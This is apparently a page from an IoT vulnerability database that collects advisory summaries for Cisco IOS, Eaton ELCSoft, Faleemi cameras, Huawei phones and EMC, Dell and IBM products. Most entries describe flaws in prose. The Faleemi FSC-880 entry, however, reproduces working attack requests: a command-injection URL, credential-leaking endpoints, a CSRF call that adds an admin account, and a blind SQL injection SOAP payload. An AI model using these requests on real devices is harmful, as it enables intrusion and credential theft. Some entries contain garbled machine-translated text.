VARIoT IoT vulnerabilities database

Multiple vulnerabilities in the implementation of the Common Industrial Protocol (CIP) feature in Cisco IOS 12.4 through 15.6 could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to the improper parsing of crafted CIP packets destined to an affected device. An attacker could exploit these vulnerabilities by sending crafted CIP packets to be processed by an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Cisco Bug IDs: CSCuz95334. Cisco IOS Contains an input validation vulnerability. Vendors have confirmed this vulnerability Bug ID CSCuz95334 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Cisco IOS is an operating system developed by Cisco Systems for its network devices

Multiple vulnerabilities in the implementation of the Common Industrial Protocol (CIP) feature in Cisco IOS 12.4 through 15.6 could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to the improper parsing of crafted CIP packets destined to an affected device. An attacker could exploit these vulnerabilities by sending crafted CIP packets to be processed by an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Cisco Bug IDs: CSCvc43709. Cisco IOS Contains an input validation vulnerability. Vendors have confirmed this vulnerability Bug ID CSCvc43709 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Cisco IOS is an operating system developed by Cisco Systems for its network devices

A vulnerability in the implementation of the PROFINET Discovery and Configuration Protocol (PN-DCP) for Cisco IOS 12.2 through 15.6 could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to the improper parsing of ingress PN-DCP Identify Request packets destined to an affected device. An attacker could exploit this vulnerability by sending a crafted PN-DCP Identify Request packet to an affected device and then continuing to send normal PN-DCP Identify Request packets to the device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. This vulnerability affects Cisco devices that are configured to process PROFINET messages. Beginning with Cisco IOS Software Release 12.2(52)SE, PROFINET is enabled by default on all the base switch module and expansion-unit Ethernet ports. Cisco Bug IDs: CSCuz47179. Cisco IOS Contains an input validation vulnerability. Vendors have confirmed this vulnerability Bug ID CSCuz47179 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Cisco IOS is an operating system developed by Cisco Systems for its network devices

A vulnerability in the implementation of the Locator/ID Separation Protocol (LISP) in Cisco IOS XE 3.2 through 16.5 could allow an unauthenticated, remote attacker using an x tunnel router to bypass authentication checks performed when registering an Endpoint Identifier (EID) to a Routing Locator (RLOC) in the map server/map resolver (MS/MR). The vulnerability is due to a logic error introduced via a code regression for the affected software. An attacker could exploit this vulnerability by sending specific valid map-registration requests, which will be accepted by the MS/MR even if the authentication keys do not match, to the affected software. A successful exploit could allow the attacker to inject invalid mappings of EIDs to RLOCs in the MS/MR of the affected software. This vulnerability affects Cisco devices that are configured with LISP acting as an IPv4 or IPv6 map server. This vulnerability affects Cisco IOS XE Software release trains 3.9E and Everest 16.4. Cisco Bug IDs: CSCvc18008. Vendors have confirmed this vulnerability Bug ID CSCvc18008 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco IOSXE is an operating system developed by Cisco Systems for its network devices. This may lead to further attacks

A vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS 15.0 through 15.6 and Cisco IOS XE 3.5 through 16.5 could allow an unauthenticated, remote attacker to cause high CPU utilization, traceback messages, or a reload of an affected device that leads to a denial of service (DoS) condition. The vulnerability is due to how an affected device processes certain IKEv2 packets. An attacker could exploit this vulnerability by sending specific IKEv2 packets to an affected device to be processed. A successful exploit could allow the attacker to cause high CPU utilization, traceback messages, or a reload of the affected device that leads to a DoS condition. This vulnerability affects Cisco devices that have the Internet Security Association and Key Management Protocol (ISAKMP) enabled. Although only IKEv2 packets can be used to trigger this vulnerability, devices that are running Cisco IOS Software or Cisco IOS XE Software are vulnerable when ISAKMP is enabled. A device does not need to be configured with any IKEv2-specific features to be vulnerable. Many features use IKEv2, including different types of VPNs such as the following: LAN-to-LAN VPN; Remote-access VPN, excluding SSL VPN; Dynamic Multipoint VPN (DMVPN); and FlexVPN. Cisco Bug IDs: CSCvc41277. Vendors have confirmed this vulnerability Bug ID CSCvc41277 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Internet Key Exchange Version 2 (IKEv2) module is one of the key exchange protocol modules

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of a LAD file. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of an SFC file. The process does not properly validate user-supplied data which, can result in memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of a SegCmt record in an EPC file. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of a Device Comment Range record in an EPC file. The issue results from the lack of proper validation of user-supplied data, which can result in a write to an arbitrary address. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of a DEV file. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of an EPC file. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of an EPC file. The process does not properly validate user-supplied data, which can result in memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.

Faleemi FSC-880 00.01.01.0048P2 devices allow unauthenticated SQL injection via the Username element in an XML document to /onvif/device_service, as demonstrated by reading the admin password. Faleemi FSC-880 Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FaleemiFSC-880 is a network camera product from Faleemi, USA. A SQL injection vulnerability exists in the FaleemiFSC-88000.01.01.0048P2 release. This vulnerability can be exploited by a remote attacker to read the administrator password. Full disclosure is here: https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce <https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce> === Timeline: 25 August 2017: the research was made 29 August 2017: an email was sent to the vendor, but with no answer 25 September 2017: public disclosure 26 September 2017: assigned CVE-2017a14743 https://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/ Firmware: 00.01.01.0048P2 (2017-07-27) This camera has multiple security vulnerabilities, which can be exploited both locally and remotely. In particular, hardwired manufacturer DDNS and port-mapping to camera via upnp compatible router. Allowing for the discovered avoidance of authentication and RCE, this camera is an ideal candidate for another botnet such as Mirai. CVE-2017a14743 Vulnerabilities RCE Works in stock firmware 00.01.01.0046 (E2017a03-**) In the latest firmware (00.01.01.0048P2 (2017a07a27)) this is fixedaaaftp client is removed. It is not in processes and in file systemaaaostensibly because realization was altered. Remote code execution in admin panel in GET parameters of Ft server scenario http://IP/hy-cgi/ftp.cgi?cmd=setftpattr&ft_server=;RCE;&ftp_port==25&ft_username=&ft_password=&ft_dirname= RCE2 (LAN) During analysis and reversing of the firmware we found and undocumented functionaaait is possible to quite simply turn on telnet on the device: Turn on telnet on port 23 http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus&enable=1 Check status http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus Password protected Telnetaaasame as on web panel but with one exception: telnet is not connected to upnp. This suggests that port is not accessible outside LAN. We have so far been unable to connect it because we have not found custom settings of doing so to upnp. enable upnp: http://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr&upnp_enable=1 upnp status: http://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr&cmd=getupnpmap&cmd=getupnptmstatus Plaintext passwords User passwords are stored on the device in plaintext format in several locations simultaneously: /etc/webserver/lighttpd.user /mnt/mtd/db/ipcsys.db Passwords are synchronised when changed. Information Disclosure Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY Device Info: http://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo WIFI credentials leak: http://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr Current user credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo All users credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr Third Party DDNS credentials leak: http://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr Manufactureras DDNS credentials leak: http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns SMTP settings and credentials leak: http://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr FTP settings and credentials leak: http://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr CSRF Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY http://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot http://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog http://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog http://192.168.0.100/hy-cgi/user.cgi?cmd=adduser&at_username=BACKDOOR_ADMIN&at_password=BACKDOOR_PASSWORD&at_rolename=admin All changes in camera settings go through GET commands and donat use CSRF tokens. The following functions can be executed remotely: Configure Camera Format SD card Delete Logs Steal image from camera These actions and commands can be executed from admin browser. The indecent hacker only needs to lure the admin to their page. Similar attacks on routers have been registered in the past: http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html And some more epic stuff Manufactureras DDNS enumeration There are hardwired DDNS manufacturer settings found in the device. The device sends an http request using udp www.nwsvr1.com, and sends its internal address and admin web panel IP address to API http://www.nwsvr1.com/api/userip.asp The device we researched has DDNS name 009lfld.nwsvr1.com. Knowing that device names are generated automatically, it is possible to enumerate the entire range of names using a mask 00\d[a-z]{4}.nwsvr1.com and obtain a full list of devices in the network. We found a total of 758000 devices, which connected with this DDNS at least once in the past. These are cameras by different manufacturers, that are somehow related to each other. Around 3% of devices are in the network.. HK 18.41% US 12.72% DE 9.94% ES 6.77% FR 5.66% AR 5.09% GB 5.00% DK 3.79% IT 3.34% PL 3.04% MX 1.90% CN 1.55% VN 1.53% JP 1.53% HU 1.40% CL 1.27% BR 1.20% TH 1.19% A little over 20% of all devices use a default password. Virtually all devices are accessible by ONVIF A similar number (20a25 thousands devices are online) are vulnerable to auth bypass via sqli. We have serious concerns that the DDNs password, which is hardwired into the device by the manufacturer is incremental. This means that it is possible to reverse-calculate the password to the camera based on its DDNS name. This raises the risk of the password being hijacked if the IP cards are switched on DDNS server, then redirected the admin using a camera with a DDNS name and grabs the password using his own authentication form. Authorization bypass via blind SQLi Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY A device without authentication on web-port has an accessible endpoint by default /onvif/ ONVIF is an API standard for such devices. WSDL can be downloaded from the official website (www.onvif.org). API uses authentication by tokens. Using this it is possible to obtain an admin password. Example of the exploit: /* https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce */ POST /onvif/device_service HTTP/1.1 Content-Type: application/soap+xml Content-Length: 1076 charset: utf-8 Host: 192.168.0.100 Connection: close <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing"> <s:Header> <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"> <UsernameToken> <Username>adfgadfhart' AND 1=2 UNION SELECT 1,'admin',(select unicode(substr(C_PassWord, 2, 1)) from t_user limit 1 OFF SET 0),'remark'/*</Username> <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">UHZj ybNG8udkMEflf+LjkCUmR88=</Password> <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">fD nW+mqvvsID/WJGNR6QWQ==</Nonce> <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-01-01T00:03:58 .674Z</Created> </UsernameToken> </Security> </s:Header> <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/> </s:Body> </s:Envelope> To do this, the date and time set in the device are needed because they are used to build the password field of the authentication token. We drafted this POC, which allows to extract from the camera a password and gain entry to the device using admin credentials. This research was made by IoTSploit Team. Feel free to contact us at oleg@iotsploit.co and visit our website at https://iotsploit.co/ If you have any active contact with Faleemi, please, show them this report and we are ready to coop

HuaweiY6Pro is a smartphone from China's Huawei company. An information disclosure vulnerability exists in the HuaweiY6Pro mobile phone using the AEEextension module of the MTK platform. Because of a misauthorization of a particular process, an attacker could convince a user to install a malicious application that an application can use to obtain user information.

EMC Unisphere for VMAX Virtual Appliance (vApp) versions prior to 8.4.0.15, EMC Solutions Enabler Virtual Appliance versions prior to 8.4.0.15, EMC VASA Virtual Appliance versions prior to 8.4.0.512, and EMC VMAX Embedded Management (eManagement) versions prior to and including 1.4 (Enginuity Release 5977.1125.1125 and earlier) contain an authentication bypass vulnerability that may potentially be exploited by malicious users to compromise the affected system. plural EMC The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of EMC Unisphere For VMAX vApp Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists within the ORBServlet. The vulnerability is caused by improper access controls that allow the creation of admin credentials. An attacker can leverage this vulnerability to disclose sensitive information under the context of the web application. Multiple EMC Products are prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass authentication mechanism and perform unauthorized actions. This may lead to further attacks. Details: The vApp Manager contains a servlet that does not perform proper authentication checks before processing AMF messages for user creation requests. A remote unauthenticated attacker, by having knowledge of the message format, may potentially create new user accounts with administrative privileges, and then log in to the affected application. Link to remedies: Customers can download software for EMC Unisphere for VMAX Virtual Appliance 8.4.0.15 OVA and ISO from EMC Online Support at https://support.emc.com/downloads/27045_Unisphere-for-VMAX Customers are recommended to contact Customer Support and place a Customer Service Request for all other fixes. Credit: EMC would like to thank rgod working with Trend Micro's Zero Day Initiative, for reporting this issue. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJZ90fjAAoJEHbcu+fsE81ZtNYIAIQvi8RPtbxQv8PA5Q2vIsij sCo3qsDMMA1wSViqiHVS03HmJXC/ju/snPKEwC7tGAyrwzdNxSrqUzQNwQur9V94 r7Uqfk/LxhuyXypUujw61UsPd9v7mhZ1x/kzxSkVP8000LMi2r6eihyBC3pI+eZ8 d3vr7V8x+jtco9YD9bzMYqwXsMWqINJTwZrTam+xpHIqZax/qsaHLx7aFK6nwT4d 6V2t9Jlyt7B80TyQuHDlA4CXJXMbW37zPi9iOiJwdHIB8QbM6tz8cVuM1jjCq922 5xDA27SEKPFXyl6O9zNqrFL0tahMwtLAizO8QM9b03FXaqdq7pnaCMBjgZS2jVc= =Dt5B -----END PGP SIGNATURE-----

Honor 8,Honor V8,Honor 9,Honor V9,Nova 2,Nova 2 Plus,P9,P10 Plus,Toronto Huawei smart phones with software of versions earlier than FRD-AL00C00B391, versions earlier than FRD-DL00C00B391, versions earlier than KNT-AL10C00B391, versions earlier than KNT-AL20C00B391, versions earlier than KNT-UL10C00B391, versions earlier than KNT-TL10C00B391, versions earlier than Stanford-AL00C00B175, versions earlier than Stanford-AL10C00B175, versions earlier than Stanford-TL00C01B175, versions earlier than Duke-AL20C00B191, versions earlier than Duke-TL30C01B191, versions earlier than Picasso-AL00C00B162, versions earlier than Picasso-TL00C01B162 , versions earlier than Barca-AL00C00B162, versions earlier than Barca-TL00C00B162, versions earlier than EVA-AL10C00B396SP03, versions earlier than EVA-CL00C92B396, versions earlier than EVA-DL00C17B396, versions earlier than EVA-TL00C01B396 , versions earlier than Vicky-AL00AC00B172, versions earlier than Toronto-AL00AC00B191, versions earlier than Toronto-TL10C01B191 have an unlock code verification bypassing vulnerability. An attacker with the root privilege of a mobile can exploit this vulnerability to bypass the unlock code verification and unlock the mobile phone bootloader. plural Huawei Smartphone software contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Glory 8, Glory V8, Glory 9, Glory V9, Enjoy 7Plus, P9, P10Plus, Nova2 and Nova2Plus are all Huawei smartphones from China. The Huawei Honor 8 and others are smartphone products of the Chinese company Huawei. Several Huawei products have security vulnerabilities

Honor 8,Honor V8,Honor 9,Honor V9,Nova 2,Nova 2 Plus,P9,P10 Plus,Toronto Huawei smart phones with software of versions earlier than FRD-AL00C00B391, versions earlier than FRD-DL00C00B391, versions earlier than KNT-AL10C00B391, versions earlier than KNT-AL20C00B391, versions earlier than KNT-UL10C00B391, versions earlier than KNT-TL10C00B391, versions earlier than Stanford-AL00C00B175, versions earlier than Stanford-AL10C00B175, versions earlier than Stanford-TL00C01B175, versions earlier than Duke-AL20C00B191, versions earlier than Duke-TL30C01B191, versions earlier than Picasso-AL00C00B162, versions earlier than Picasso-TL00C01B162 , versions earlier than Barca-AL00C00B162, versions earlier than Barca-TL00C00B162, versions earlier than EVA-AL10C00B396SP03, versions earlier than EVA-CL00C92B396, versions earlier than EVA-DL00C17B396, versions earlier than EVA-TL00C01B396 , versions earlier than Vicky-AL00AC00B172, versions earlier than Toronto-AL00AC00B191, versions earlier than Toronto-TL10C01B191 have a permission control vulnerability. An attacker with the system privilege of a mobile can exploit this vulnerability to bypass the unlock code verification and unlock the mobile phone bootloader. plural Huawei Smartphone software contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Glory 8, Glory V8, Glory 9, Glory V9, Enjoy 7Plus, P9, P10Plus, Nova2 and Nova2Plus are all Huawei smartphones from China. There are permission control vulnerabilities in various Huawei phones. The Huawei Honor 8 and others are smartphone products of the Chinese company Huawei. Several Huawei products have security vulnerabilities

The SMI-S service in Dell Storage Manager versions earlier than 16.3.20 (aka 2016 R3.20) is protected using a hard-coded password. A remote user with the knowledge of the password might potentially disable the SMI-S service via HTTP requests, affecting storage management and monitoring functionality via the SMI-S interface. This issue, aka DSM-30415, only affects a Windows installation of the Data Collector (not applicable to the virtual appliance). Dell Storage Manager is an application for managing and monitoring multiple Storage Centers and PS series FluidFS from Dell. An attacker can exploit this vulnerability by sending HTTP requests to disable the SMI-S service

EMC Elastic Cloud Storage (ECS) before 3.1 is affected by an undocumented account vulnerability that could potentially be leveraged by malicious users to compromise the affected system. Remote attackers with knowledge of the default credentials may exploit this vulnerability to gain unauthorized access and perform unauthorized actions. This may aid in further attacks. Versions prior to EMC Elastic Cloud Storage 3.1 are vulnerable. A remote attacker could exploit this vulnerability to take control of an affected system. Details: ECS versions prior to 3.1 contain an undocumented account (emcservice) that is protected with a default password. This user account is intended for use by customer support representatives to troubleshoot ECS configuration issues. Resolution: Information about this account has been added to the ECS 3.1 Security Configuration Guide. EMC recommends all customers to change the default password at the earliest opportunity. Link to Remedy: Customers are requested to contact Customer Support to help change the default password for this account. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJZypJ7AAoJEHbcu+fsE81Zox4H/R/y4X7VOWaM7dH/tZHcwdvr kPZ+2OF/qGqArBpOQxO3l8tZp986Ru2BOz+VSZeh/4ZUl91o2SyNv5WdB3tT6bIl VhWm9NtrCU60m5m2LAGvDnaycqjC+oDQOYJ0uD6bgYu5VGNPySaQ1Nd7yGucQ+nR /8yxLWomiUmXJkW/7xeEBZ9sNugL9RdKBq30B4K9FPKtYQ8wcf7PF5rv8JHVqGax bkbtJOjnYHeC+LUFtcJ9CPpC8MUQ2ua70LBSDeunPsOZdwjDLm8KhYZ75v0hCEi3 veye1eNG2/NRLFf25hMmNh7rh/nT2p4jsSAU6qYu11lQKPH36Iq6N9DXCSC/l44= =8t9r -----END PGP SIGNATURE-----

IBM WebSphere DataPower Appliances 7.0.0 through 7.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132368. Vendors have confirmed this vulnerability IBM X-Force ID: 132368 It is released as.Information may be obtained and information may be altered. IBMWebSphereDataPowerAppliances is a set of network equipment from IBM Corporation of the United States. The device is designed to simplify, secure, and accelerate the deployment of XML and Web services in SOA. A remote attacker could exploit this vulnerability to inject arbitrary JavaScript code into the WebUI. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks